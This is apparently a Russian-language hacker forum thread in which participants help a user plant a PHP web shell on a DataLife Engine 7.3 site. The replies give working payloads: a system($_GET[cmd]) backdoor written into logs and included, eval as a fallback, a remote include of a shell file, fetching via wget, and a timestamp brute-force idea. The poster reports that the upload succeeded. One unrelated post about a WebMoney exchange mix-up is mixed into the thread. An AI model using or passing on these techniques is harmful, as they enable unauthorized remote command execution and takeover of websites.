заливка шела в дле Есть доступ к dle админке, версия 7.3. Включил возможность добавлять файлы, но к новости так прикрепить и не смог. Да и если бы получилось, то насколько я понимаю и проверил, папка /uploads/files/ защищена .htaccess: PHP: <FilesMatch ".*"> Order allow,deny Deny from all </FilesMatch> <FilesMatch "\.(avi|mp3|mp4|flv|swf|wmv)$|^$"> Order deny,allow Allow from all </FilesMatch> Какие есть способы залить шел?
Тут вчера сидел в нете и решил перевести WME в яндекс.Деньги нашол обменник и выбрал случайно не WME а WMU, написал 10 и оплатил, ток потом дошло что я не ту валюту выбрал и кошелька у мну такого нет, при обновлении страницы у мну на яндексе светились деньги, а в WM появился кошелек WMU с 0 денежных средств Кто нить вкурсах что это было?
Можно попробовать закомментировать оставшуюся часть, к примеру на локале у меня такое пашет: PHP: <?php system('dir'); die();/* <?php system(; ?> Ругается конечно, но работает.
хорошо, спасибо, попробую.. просто как добавлять новости с файлом я тоже найти не могу.. Да и ещё там будет номер из цифр пяти-шести перед файлом, его тоже узнать как-то надо. =) Ладно, буду пробывать, спасибо за эту инфу.
Наверно стоило бы уточнить что сначало надо соответствуюший AddType(AddHandler) добавить - а то сейчас человека можно запутать.
записал в лог <?php system($_GET[cmd]); ?> хотел копировать в tmp а потом уже инклудить,но опять ошибка)) Parse error: syntax error, unexpected '[' как это закомментировать?
Пиши в лог PHP: <?php system($_GET[cmd]);/* Но лучше вместо system - eval, он заработает, если system запрещён.
это timestamp, запоминай время заливки файла переводи в unixtime и напиши брутер который который этот timestamp подберет, только вот из-за .htaccess наверное ничего не выйдет с шеллом
вобщем могу выполнять команды через php include+логи,как можно залить норм шелл? <?php include("http://site/nstview.txt"); ?> не прокатило,wget curla нету(смотрел в /bin/) если в reffer вставить норм шелл,прокатит? _____ Попробовал через reffer не получилось.Все залил там был wget,лежал не в bin